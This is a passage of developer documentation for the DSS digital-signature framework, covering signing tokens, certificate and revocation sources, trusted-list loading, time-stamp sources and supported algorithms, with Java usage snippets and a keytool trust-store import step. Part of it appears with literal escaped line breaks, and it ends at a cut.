== Management of signature tokens

The DSS framework is able to create signatures with PKCS#11, PKCS#12 and MS CAPI. Java 6 is inherently capable of communicating with these kinds of KeyStores. To be independent of the signing media, the DSS framework uses an interface named SignatureTokenConnection to manage the different implementations of the signing process. The base implementation is able to sign a stream of data in one step. That means that all the data to be signed needs to be sent to the SSCD. This is the case for MS CAPI. As for PKCS#11 and PKCS#12, which give the developer finer control over the signature operation, the DSS framework implements the AsyncSignatureTokenConnection abstract class, which permits executing the digest operation and the signature operation in two different threads or even on two different hardware devices.

This design also permits other card providers/adopters to create their own implementations. For example, this can be used for a direct connection to the Smartcard through Java 6 PC/SC.

=== PKCS#11

PKCS#11 is widely used to access smart cards and HSMs. Most commercial software uses PKCS#11 to access the signature key of the CA or to enrol user certificates. In the DSS framework, this standard is encapsulated in the class `Pkcs11SignatureToken`.

[source,java,indent=0]
.Pkcs11SignatureToken usage
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/snippets/PKCS11Snippet.java[tags=demo]
----

=== PKCS#12

This standard defines a file format commonly used to store a private key and the corresponding public key certificate, protecting them with a password.

In order to use this format with the DSS framework you have to go through the class `Pkcs12SignatureToken`.

[source,java,indent=0]
.Pkcs12SignatureToken usage
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/snippets/PKCS12Snippet.java[tags=demo]
----

=== MS CAPI

If the middleware for communicating with an SSCD provides a CSP based on the MS CAPI specification, then you can use the `MSCAPISignatureToken` class to sign the documents.

[source,java,indent=0]
.MSCAPISignatureToken usage
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/snippets/MSCAPISnippet.java[tags=demo]
----

=== Other Implementations

As you can see, it is easy to add another implementation of the SignatureTokenConnection, thus enabling the framework to use other APIs than the three provided (PKCS#11, PKCS#12 and MS CAPI). For example, it is likely that in the future PC/SC will be the preferred way of accessing a Smartcard. Although PKCS#11 is currently the most used API, the DSS framework is extensible and can use PC/SC. For our design example we propose to use PC/SC to communicate with the Smartcard.
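
Whatever the implementation, the interface is used in the same way. The following minimal sketch signs some bytes through a hypothetical PKCS#12 keystore (the file name and password are placeholders); any other SignatureTokenConnection could be substituted:

[source,java]
.Generic SignatureTokenConnection usage (sketch)
----
import java.security.KeyStore.PasswordProtection;

import eu.europa.esig.dss.enumerations.DigestAlgorithm;
import eu.europa.esig.dss.model.SignatureValue;
import eu.europa.esig.dss.model.ToBeSigned;
import eu.europa.esig.dss.token.DSSPrivateKeyEntry;
import eu.europa.esig.dss.token.Pkcs12SignatureToken;
import eu.europa.esig.dss.token.SignatureTokenConnection;

public class TokenUsageSketch {

    public static void main(String[] args) throws Exception {
        // Hypothetical PKCS#12 keystore protected by a password
        try (SignatureTokenConnection token = new Pkcs12SignatureToken("keystore.p12",
                new PasswordProtection("password".toCharArray()))) {

            // List the available keys and pick the first one
            DSSPrivateKeyEntry key = token.getKeys().get(0);

            // Sign arbitrary data in one step
            ToBeSigned toBeSigned = new ToBeSigned("Hello World!".getBytes());
            SignatureValue signatureValue = token.sign(toBeSigned, DigestAlgorithm.SHA256, key);
            System.out.println(signatureValue.getAlgorithm());
        }
    }
}
----
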
== Management of certificates sources

The validation of a certificate requires access to other certificates from multiple sources (trusted lists, trust store, the signature itself): certificates can be contained inside the signature or come from any other source.
Within the framework, an X509 certificate is wrapped through the class:

 * `eu.europa.esig.dss.model.x509.CertificateToken`

This encapsulation helps make certificate handling more suited to the needs of validation in the context of trust. The framework associates two internal identifiers with the certificate: the DSS Id based on the certificate binary (unique for each certificate) and the Entity Id based on its public key (common to cross-signed certificates).

Certificate tokens are grouped into sources. A certificate token can be declared in several sources. The class that models a source is called:

 * `eu.europa.esig.dss.spi.x509.CertificateSource`

This class stores all extracted/injected certificates for a specific source (Signature, OCSP Response, Trust store, Trusted-list,...). All source types are specified in the enumeration:

 * `eu.europa.esig.dss.enumerations.CertificateSourceType`

This information is used, for example, to distinguish between certificates from a trusted source and the others. A source has one and only one type, but a certificate token can be found in multiple sources.
The DSS framework supplies some standard implementations, but also gives the possibility to implement your own solutions. Among the standard solutions you can find:

 * `eu.europa.esig.dss.spi.x509.CommonCertificateSource`

This is the superclass of almost all certificate sources. It stores the extracted certificates and implements the common methods from the `CertificateSource` to retrieve certificate(s) by subject, public key, subject key identifier (ski),...

It also exposes the method `CommonCertificateSource#addCertificate`, which gives the possibility to manually add any CertificateToken as a part of this source.

 * `eu.europa.esig.dss.spi.x509.CommonTrustedCertificateSource`

The CommonTrustedCertificateSource is a certificate source for trusted certificates. All added certificates are marked as trust anchors and no revocation data are required for these certificates.

 * `eu.europa.esig.dss.validation.SignatureCertificateSource`

This class and its sub-classes are used to extract and collect certificates from signatures / timestamps. It also has methods to retrieve certificates / certificate references by their origin (e.g. SigningCertificate attribute, DSS Dictionary,...).

 * `eu.europa.esig.dss.spi.tsl.TrustedListsCertificateSource`

Certificates coming from the list of Trusted Lists. This class inherits from `CommonTrustedCertificateSource` and gives the mechanism to define the set of trusted certificates (trust anchors). They are used in the validation process to decide whether the prospective certificate chain has a trust anchor. See chapter <<tlValidationJob>> for more information about trusted lists loading (e.g. the EU Trusted List).

 * `eu.europa.esig.dss.spi.x509.ListCertificateSource`

This class follows the composite design pattern with a list of CertificateSources. It is used during validation to retrieve all sources from the signatures / timestamps / revocation data / trusted lists /... It contains some methods which check over all sources to retrieve certificates or to verify whether a certificate is trusted.
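
As a small illustration of these APIs, the sketch below populates a trusted source by hand; the certificate file name is a placeholder:

[source,java]
.Populating a trusted certificate source (sketch)
----
import java.io.File;

import eu.europa.esig.dss.model.x509.CertificateToken;
import eu.europa.esig.dss.spi.DSSUtils;
import eu.europa.esig.dss.spi.x509.CommonTrustedCertificateSource;

public class TrustedSourceSketch {

    public static void main(String[] args) {
        // Load a certificate from a file (placeholder path)
        CertificateToken caCertificate = DSSUtils.loadCertificate(new File("root-ca.cer"));

        // Every certificate added here becomes a trust anchor
        CommonTrustedCertificateSource trustedSource = new CommonTrustedCertificateSource();
        trustedSource.addCertificate(caCertificate);
    }
}
----
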
== Management of CRL and OCSP sources

A CRL is a time-stamped list identifying revoked certificates. It is signed by a Certificate Authority (CA) and made freely available in a public repository. Each revoked certificate is identified in a CRL by its certificate serial number.

The Online Certificate Status Protocol (OCSP) is an Internet protocol used for obtaining the revocation status of a unique X.509 digital certificate.

For every certificate, the validity has to be checked via CRL or OCSP responses. The information may originate from different CRLSources or OCSPSources.
To ease the usage of such sources, DSS implements the CRLSource and OCSPSource interfaces (which inherit from RevocationSource), which offer a generic, uniform way of accessing CRL and OCSP sources. Furthermore, a caching mechanism can easily be attached to those sources, optimizing the access time to revocation information by reducing network connections to online servers.

The interface CRLSource defines the method which returns a CRLToken for the given certificate/issuer certificate couple:

[source,java,indent=0]
.CRLSource usage
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/snippets/CRLSourceSnippet.java[tags=demo]
----

The interface OCSPSource defines the method which returns an OCSPToken for the given certificate/issuer certificate couple:

[source,java,indent=0]
.OCSPSource usage
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/snippets/OCSPSourceSnippet.java[tags=demo]
----

These classes are used during the certificate validation process through the "validationContext" object (based on the ValidationContext class), which is a "cache" for one validation request that contains every object retrieved so far. This object in turn instantiates a "verifier" based on the `RevocationDataLoadingStrategy` class, whose role is to fetch revocation data by querying an OCSP or CRL source in the defined order and to return the first successful result.
In general, we can distinguish four main kinds of sources:

 * Offline sources (`OfflineRevocationSource`);
 * Online sources (`OnlineRevocationSource`);
 * Sources with a cache mechanism;
 * Lists of sources (`ListRevocationSource`) with a collection of several sources.

=== Repository Revocation Source

The above-mentioned class allows caching CRL and OCSP responses in a user-chosen repository. By default DSS provides a JDBC based implementation for this class, but other implementations can also be created. The class contains a complete set of functions to save revocation data to a database, and to extract, update and remove it. +
Furthermore, the `RepositoryRevocationSource` allows the implementer to define a backup revocation source, in case the database does not contain the certificate's revocation data yet.

List of cached Revocation sources implemented in DSS:

 * `JdbcRevocationSource`
 ** `JdbcCacheCRLSource`
 ** `JdbcCacheOCSPSource`

The classes allow the following configuration:

[source,java,indent=0]
.JdbcCacheCRLSource usage
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/snippets/CRLSourceSnippet.java[tags=demo-cached]
----

And an example for JdbcCacheOCSPSource:

[source,java,indent=0]
.JdbcCacheOCSPSource usage
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/snippets/OCSPSourceSnippet.java[tags=demo-cached]
----

Be aware that you have to initialize a table before starting to work with the cached revocation repository.

=== Other implementations of CRL and OCSP Sources

Such sources find the status of a certificate either from a list stored locally, from the information contained in the advanced signature, or from an online source. Here is the list of sources already implemented in the DSS framework:

 * CRL sources
 ** `OfflineCRLSource`: This class implements the `OfflineRevocationSource` and retrieves the revocation data from extracted information.
The code is common for all signature formats and CRL contents are injected by its sub-classes:
 *** `CMSCRLSource`: Extracts CRLs and CRL references from a CMS Signed Data:
 **** `CAdESCRLSource`: Sub-class of `CMSCRLSource` for a CAdES Signature;
 **** `TimestampCRLSource`: Sub-class of `CMSCRLSource` for a Timestamp token (RFC 3161);
 *** `PAdESCRLSource`: Extracts CRLs and CRL references from a PAdES signature.
 *** `XAdESCRLSource`: Extracts CRLs and CRL references from a XAdES signature.
 *** `ExternalResourcesCRLSource`: A class that can instantiate a list of certificate revocation lists from a directory containing the individual lists.
 ** `OnlineCRLSource`: Retrieves CRL files from online sources, using the CRL Distribution Points information from the certificate.
 ** `JdbcCacheCRLSource`: Implementation of the `JdbcRevocationSource`. This implementation allows the storage of valid CRL entries in a defined `DataSource` and retrieving them locally.

 * OCSP sources
 ** `OfflineOCSPSource`: This class implements the `OfflineRevocationSource` and retrieves the revocation data from extracted information. The code is common for all signature formats and OCSP responses are injected by its sub-classes:
 *** `CMSOCSPSource`: Extracts OCSP responses and OCSP references from a CMS Signed Data:
 **** `CAdESOCSPSource`: Sub-class of `CMSOCSPSource` for a CAdES Signature;
 **** `TimestampOCSPSource`: Sub-class of `CMSOCSPSource` for a Timestamp token (RFC 3161);
 *** `PAdESOCSPSource`: Extracts OCSP responses and OCSP references from a PAdES signature.
 *** `XAdESOCSPSource`: Extracts OCSP responses and OCSP references from a XAdES signature.
 *** `ExternalResourcesOCSPSource`: A class that can instantiate a list of OCSPToken from a directory containing the individual DER encoded files.
 ** `OnlineOCSPSource`: Retrieves OCSP responses from an online source.
 ** `JdbcCacheOCSPSource`: Implementation of the `JdbcRevocationSource`. This implementation allows the storage of valid OCSP entries in a defined `DataSource` and retrieving them locally.

==== Online CRL Source

This is a representation of an Online CRL repository. This implementation will contact the CRL responder over HTTP to download the CRLs from the given URI. Note that the certificate's CRL Distribution Points extension (OID value: 2.5.29.31) is used to find the location of the CRL files; the URIs of the CRL server will be extracted from this property.

It allows the following configuration:

[source,java,indent=0]
.OnlineCRLSource usage
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/snippets/CRLSourceSnippet.java[tags=demo-online]
----

==== Online OCSP Source

This is a representation of an Online OCSP repository. This implementation will contact the OCSP responder over HTTP to retrieve the OCSP response. Note that the certificate's Authority Information Access (AIA) extension is used to find the issuer's resource locations, such as the CRT file and/or the Online Certificate Status Protocol (OCSP) responder.
The URIs of the OCSP server will be extracted from this property (OID value: 1.3.6.1.5.5.7.48.1).

It allows the following configuration:

[source,java,indent=0]
.OnlineOCSPSource usage
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/snippets/OCSPSourceSnippet.java[tags=demo-online]
----

[[certificateVerifier]]
== CertificateVerifier configuration

The CertificateVerifier and its implementation CommonCertificateVerifier determine how DSS accesses external resources and how it should react in certain situations. This configuration is used in both extension and validation modes.

[source,java,indent=0]
.CertificateVerifier usage
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/snippets/CertificateVerifierSnippet.java[tags=demo]
----

== Trust Anchor(s) configuration

Trust anchors play an important part in signature creation / validation. They define which entities are trusted and which signatures can be trusted: do I trust certificates/signatures from another company / country / ...?

Since version 5.6, DSS allows configuring one or more trusted certificate source(s). These sources can be configured from a TrustStore (a kind of keystore which only contains certificates), a trusted list and/or a list of trusted lists.

[source,java,indent=0]
.Multiple trusted certificate sources usage
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/snippets/TLValidationJobSnippets.java[tags=multi-trusted-certificate-sources]
----

=== Trust store initialization

If you have a collection of certificates to trust, the easiest way to provide them to DSS is to use a KeyStore / TrustStore.

[source,java,indent=0]
.Trust anchor initialization from a Trust Store
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/snippets/TLValidationJobSnippets.java[tags=trust-store]
----

To generate the trust store, there is a utility class CreateKeyStoreApp in the dss-cookbook module.

=== Trusted List Certificate Source

In several countries, a list of Trust Service Providers (TSP) is published. This list is usually published in a machine processable format (XML) and sometimes in a human-readable format (PDF). A standard (ETSI TS 119 612) exists with the specifications for the XML format.

DSS contains all the resources needed to download, parse, validate and interpret the trusted list contents. Since DSS 5.6, it is possible to configure one or more independent trusted list(s) (i.e. not linked to a list of trusted lists) and/or one or more lists of trusted lists.

If you want to collect your trusted certificates from trusted list(s), the TrustedListsCertificateSource is required. The trusted list(s) loading can take some time (connection time-outs, XML parsing, XML validation,...). This process is usually executed in the background. An instance of TrustedListsCertificateSource needs to be created; it will be synchronized with the TLValidationJob.

[source,java,indent=0]
.Trusted List Certificate Source
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/snippets/TLValidationJobSnippets.java[tags=trusted-list-source]
----

[[tlValidationJob]]
== TLValidationJob

The TLValidationJob allows downloading, parsing and validating the Trusted List(s) and Lists Of Trusted Lists (LOTL). Once the task is done, its result is stored in the TrustedListsCertificateSource.
The job uses three different caches (download, parsing and validation) and a state-machine to be efficient.

Trusted lists are stored on the file system. This offers the possibility to run in offline mode with the stored trusted lists. Trusted Lists can be loaded from the file system and/or from the Internet.

In the next sections the different configurations will be covered.

=== TLSource and LOTLSource

Several TLSources and several LOTLSources can be injected into a TLValidationJob. The only constraint is the uniqueness of the Trusted List URLs.

[source,java,indent=0]
.Multiple TLSources and multiple LOTLSources configuration
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/snippets/TLValidationJobSnippets.java[tags=job-config-sources]
----

==== Trusted List Source (TLSource)

A TLSource allows quickly setting up a trusted list configuration. The URL and the signing certificates for this TL are mandatory. Optionally, predicates / filters can be configured to retrieve only a part of the trust service providers or trust services.

[source,java,indent=0]
.TLSource configuration
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/snippets/TLValidationJobSnippets.java[tags=french-tl-source]
----

==== List Of Trusted Lists Source (LOTLSource)

A similar configuration is possible for Lists Of Trusted Lists (LOTL). It requires a URL and the possible LOTL signers. Some other parameters are possible. By default, all listed trusted lists are loaded.

[source,java,indent=0]
.LOTLSource configuration
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/snippets/TLValidationJobSnippets.java[tags=european-lotl-source]
----

=== DSSFileLoader

The FileCacheDataLoader is used to download the trusted list contents to the file system. Two different configurations are needed. Both of them share the same folder:

 * offline refresh: download from the Internet disabled and unlimited cache expiration;
 * online refresh: download from the Internet enabled and limited cache expiration.

[source,java,indent=0]
.Offline and Online refresh configuration
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/snippets/TLValidationJobSnippets.java[tags=job-loaders]
----

=== The SynchronizationStrategy

The SynchronizationStrategy defines which trusted lists or lists of trusted lists are to be synchronized. By default, DSS synchronizes all of them and does not reject expired / invalid / ... trusted lists. Their content is trusted and a warning is added on signature / certificate validation.

The strategy is configurable via the interface SynchronizationStrategy:

[source,java,indent=0]
.Example of a custom SynchronizationStrategy
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/snippets/TLValidationJobSnippets.java[tags=custom-strategy]
----

DSS provides two implementations: ExpirationAndSignatureCheckStrategy and AcceptAllStrategy (default).

=== The CacheCleaner

The CacheCleaner specifies how DSS clears the cache (e.g. in case of an expired URL). Two options are available: memory and file-system.

[source,java,indent=0]
.CacheCleaner Configuration
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/snippets/TLValidationJobSnippets.java[tags=cache-cleaner]
----

=== Alerting from TL Loading

DSS allows running custom alerts in some situations (e.g. invalid TL signature, LOTL location change,...).
Alerts work with two concepts: detection and alert handler. After the download/parsing/validation and before the synchronization, the results are tested to detect events and launch alert(s).

[source,java,indent=0]
.Examples of Alerting
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/snippets/TLValidationJobSnippets.java[tags=alerting]
----

=== Executor Service

An Executor Service parameter allows you to customize the way the program executes on your Java machine, by configuring the number of threads to run, the await time, and so on.

[source,java,indent=0]
.Executor Service
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/snippets/TLValidationJobSnippets.java[tags=executor-service]
----

=== Complete configuration for the European LOTL

Below, you can find a complete configuration for the European List Of Trusted Lists. The URLs need to be externalized.

[source,java,indent=0]
.European LOTL Configuration
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/snippets/EuropeanLOTLSnippets.java[tags=complete-european-lotl-config]
----

=== The TL / LOTL refresh

The TL / LOTL loading in DSS works as follows:

 * Download / parse / validate all LOTLSources from the configuration with/without pivot support (multi-threaded);
 * Analyze the introduced changes and expire cache entries (new TL URLs, new signing certificates for a TL,...);
 * Create TLSources from the retrieved LOTLs;
 * Combine these TLSources with the independent TLSources (from the configuration);
 * Download / parse / validate all TLs (multi-threaded);
 * If alerts are configured, test whether an alert needs to be launched;
 * If debug is enabled, print the cache status in the log;
 * Synchronize the TrustedListCertificateSource;
 * If the cache cleaner is configured, execute it;
 * If debug is enabled, print the cache status in the log.

The refresh can be called with the offline or the online loader and runs exactly the same code.

[source,java,indent=0]
.How to refresh the Trusted List(s) and Lists of Trusted Lists
----
include::{sourcetestdir}/eu/europa/esig/dss/cookbook/example/snippets/TLValidationJobSnippets.java[tags=refresh]
----

[[KeyStore]]
==== Java Keystore Management

Generally (as in the case of the European LOTL) DSS downloads Trusted Lists over the SSL protocol (for resources served over HTTPS), which requires the certificate of the remote source to be present in the Java trust store. Certificates have their own validity period and can expire. If a certificate has expired, it will be replaced on the server by a new one in order to keep supporting a secure SSL connection. The easiest way to know whether your Java trust store is outdated and new certificates need to be added is to check your logs during a TLValidationJob update:

[source]
--
ERROR 14052 --- [pool-2-thread-30] e.e.e.dss.tsl.runnable.AbstractAnalysis  : Unable to process GET call for url [https://sr.riik.ee/tsl/estonian-tsl.xml]. Reason : [PKIX path building failed: sun.security.provider.certpath.SunCertPathBuilderException: unable to find valid certification path to requested target]
--

The `SunCertPathBuilderException` means that the certificate establishing the secure connection is not trusted by your Java Virtual Machine. In order to add the certificate to the trust store, you need to do the following steps (the example is based on the Windows OS and the Google Chrome browser):

 . Open the failed URL in your browser.
\n . Open the failed URL in your browser. In our case it is 'https:\/\/sr.riik.ee\/tsl\/estonian-tsl.xml', obtained from the logs.\n . Click on the lock icon next to the URL in the tab you just opened. It will open a window about the current connection status.\n . Click on the 'Certificate' button to open the Certificate window.\n . Go to the 'Details' tab and choose 'Copy to File...'.\n . Complete the 'Certificate Export Wizard', saving the certificate in one of the '.CER' formats. Store the file in your file system. In our example this creates the file 'ee.cer'.\n . Run 'Command Prompt' with administrator permissions (right click -> 'Run As Administrator').\n . Execute the following line (ensure that 'keytool' is installed):\n\n.Certificate import\n[source]\n----\nkeytool -import -alias newCert -file pathToCert\\ee.cer -keystore pathToJavaDirectory\\lib\\security\\cacerts -storepass changeit\n----\n\nThe default password for a Java keystore is \"changeit\". Ensure that you are using the default configuration, or use the password you have configured instead.\n\nNOTE: In order to apply the changes, the application using Java must be restarted.\n\nAfter these steps the `TLValidationJob` will successfully download the target Trusted List (i.e. the Estonian one in our example).\n\nNOTE: The described procedure is not the only available solution; if you have difficulties with it, you can search the Internet for an alternative that works for you.\n\n=== TLValidationJobSummary\n\nThe class TLValidationJobSummary contains all processed data about the download (time, error,...), the parsing (extracted information, parsing error,...) and the signature validation (signing certificate, signing time,...).\n\n[source,java,indent=0]\n.How to retrieve the information about the TLValidationJob process \n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/snippets\/TLValidationJobSnippets.java[tags=tl-summary]\n----\n\n== TSP Sources\n\nThe Time Stamp Authority, by creating time-stamp tokens, provides independent and irrefutable proof of time for business transactions, e-documents and digital signatures. The TSA must comply with the IETF RFC 3161 specifications (cf. <<R08>>). A time-stamp is obtained by sending the digest value of the given data and the digest algorithm to the Time Stamp Authority. The returned time-stamp is signed data that contains the digest value, the identity of the TSA, and the time of stamping. This proves that the given data existed before the time of stamping.\nThe DSS framework provides the TSPSource interface to implement the communication with a TSA. The class OnlineTSPSource is the default implementation, using an HTTP(S) communication layer.\nThe following bit of Java code illustrates how you might use this class:\n\n[source,java,indent=0]\n.OnlineTSPSource usage\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sources\/OnlineTSPSourceTest.java[tags=demo]\n----\n\n=== Time-stamp policy\n\nA time-stamp policy is a \"named set of rules that indicates the applicability of a time-stamp token to a particular community and\/or class of application with common security requirements\". A TSA may define its own policy which enhances the policy defined in RFC 3628. Such a policy shall incorporate or further constrain the requirements identified in RFC 3628. A time-stamp policy may be defined by the user of time-stamp services.
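\n\nIf the TSA distinguishes several policies, the policy to request can usually be set when configuring the TSP source. The following minimal sketch assumes that the `setPolicyOid` setter is available on `OnlineTSPSource` in your DSS version; the URL and the OID are placeholders:\n\n.Requesting a specific time-stamp policy (sketch)\n[source,java,indent=0]\n----\nOnlineTSPSource tspSource = new OnlineTSPSource(\"http:\/\/tsa.example.com\"); \/\/ placeholder TSA URL\ntspSource.setPolicyOid(\"1.2.3.4.5\"); \/\/ placeholder OID of the requested time-stamp policy\n----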
\n\n=== Composite TSP Source\n\nSometimes, timestamping servers may encounter interruptions (restart,...). To avoid failing signature extension, DSS allows a user to configure several TSP sources. DSS will try the sources one by one until it gets a usable timestamp token. \n\n[source,java,indent=0]\n.Configuration of a CompositeTSPSource\n----\ninclude::{sourcetestdir}\/eu\/europa\/esig\/dss\/cookbook\/example\/sources\/CompositeTSPSourceTest.java[tags=demo]\n----\n\n== Supported algorithms\n\nDSS supports several signature algorithms (combinations of an encryption algorithm and a digest algorithm). Below, you can find the supported combinations. The support of the algorithms depends on the registered OID (ASN1) or URI (XML).\n\nIn the next table, XAdES also applies to ASiC with embedded XAdES signatures, and CAdES also concerns PAdES and ASiC with embedded CAdES signatures. \n\nNOTE: SmartCards\/HSMs don't allow signing with all digest algorithms. Please refer to your SmartCard\/HSM provider.\n\n[cols=\"13*^\"]\n.Supported algorithms\n|===\n| | SHA-1 | SHA-224 | SHA-256 | SHA-384 | SHA-512 | SHA3-224 | SHA3-256 | SHA3-384 | SHA3-512 | MD2 | MD5 | RIPEMD160\n\n13+|*RSA*\n\n| XAdES | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | | | | | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] \n\n| CAdES | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"]\n\n| JAdES | | | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | | | | | |\n\n13+|*RSA-PSS*\n\n| XAdES | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | | \n\n| CAdES | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | |\n\n| JAdES | | | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | | | | | |\n\n13+|*ECDSA*\n\n| XAdES | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | | | | | | icon:check-circle[role=\"lime\"]\n\n| CAdES | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | |\n\n| JAdES | | | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | | | | | |\n\n13+|*Ed25519*\n\n| XAdES | | | | | | | | | | | | \n\n| CAdES | | | | | icon:check-circle[role=\"lime\"] | | | | | | |
\n\n13+|*DSA*\n\n| XAdES | icon:check-circle[role=\"lime\"] | | icon:check-circle[role=\"lime\"] | | | | | | | | | \n\n| CAdES | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | |\n\n| JAdES | | | | | | | | | | | |\n\n13+|*HMAC*\n\n| XAdES | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | | | | | | icon:check-circle[role=\"lime\"] \n\n| CAdES | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | |\n\n| JAdES | | | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | icon:check-circle[role=\"lime\"] | | | | | | |\n|===\n\n== Implementation management with ServiceLoader\n\nDSS incorporates modules that are loaded at runtime, based on the chosen configuration and the input data, via a https:\/\/docs.oracle.com\/javase\/8\/docs\/api\/java\/util\/ServiceLoader.html[ServiceLoader]. This gives an end user the flexibility to work only with selected modules and the possibility to extend DSS with custom implementations.\n\nIn order to provide the chosen implementation(s) to the ServiceLoader, a file listing all the desired implementations should be created in the resource directory `META-INF\/services` with a name matching the implemented interface. When merging sources (e.g. creating a Fat JAR module), the files can be lost\/overwritten and should then be configured manually (all the required implementations shall be listed).\n\nNOTE: If a DSS module(s) implementing a required interface(s) is added to your project's dependency list, the implementation will be loaded automatically.\n\nThe following modules are provided with independent implementations:\n\n * <<dssUtils>>;\n * <<dssCrlParser>>;\n * <<dssPades>>.\n \nAdditionally, DSS is able to choose the required implementation for the following interfaces:\n \n * `DocumentValidationFactory` - checks a provided signed file's format and loads a relevant validator;\n * `SignaturePolicyValidator` - checks a signature policy file and loads a relevant validator to be able to process the detected format.\n\nWARNING: If no appropriate available implementation is found, an exception will be thrown.
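\n\nFor illustration, a provider-configuration file is named after the fully qualified name of the implemented interface and lists one implementation per line; the names below are indicative only and must be adapted to the fully qualified names used in your DSS version:\n\n.Example of a provider-configuration file under META-INF\/services\n[source]\n----\n# file name: the fully qualified name of the implemented interface,\n# e.g. eu.europa.esig.dss.validation.DocumentValidationFactory\neu.europa.esig.dss.pades.validation.PDFDocumentValidatorFactory\neu.europa.esig.dss.xades.validation.XMLDocumentValidatorFactory\n----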
\n\n=== Document Validation Factory\n\nThis factory is used to create the required instance of a `DocumentValidator` based on the provided file's format (signature or timestamp). An implementation performs a file format check and loads the related <<signedDocumentValidator>> implementation to be used for the file's validation.\n\nThe following implementations are present in DSS:\n\n * CMSDocumentValidatorFactory: loads CMSDocumentValidator, used for CAdES validation (delivered in the dss-cades module);\n * XMLDocumentValidatorFactory: loads XMLDocumentValidator, used for XAdES validation (delivered in the dss-xades module);\n * PDFDocumentValidatorFactory: loads PDFDocumentValidator, used for PAdES validation (delivered in the dss-pades module);\n * JAdESDocumentValidatorFactory: loads JWSCompactDocumentValidator or JWSSerializationDocumentValidator, depending on the provided JSON signature type (delivered in the dss-jades module);\n * ASiCContainerWithCAdESValidatorFactory: loads ASiCContainerWithCAdESValidator (delivered in the dss-asic-cades module);\n * ASiCContainerWithXAdESValidatorFactory: loads ASiCContainerWithXAdESValidator (delivered in the dss-asic-xades module);\n * DetachedTimestampValidatorFactory: loads DetachedTimestampValidator, for an independent timestamp validation (delivered in the dss-document module).\n\n=== Signature Policy Validator\n\nThis interface is used to validate a signature policy reference extracted from a signature. The following implementations are provided:\n\n * BasicASNSignaturePolicyValidator: validates policy files which are based on ETSI TR 102 272;\n * XMLSignaturePolicyValidator: validates XML signature policies supporting transformations;\n * NonASN1SignaturePolicyValidator: validates a policy by a digest computed on the original file's content;\n * ZeroHashSignaturePolicyValidator: 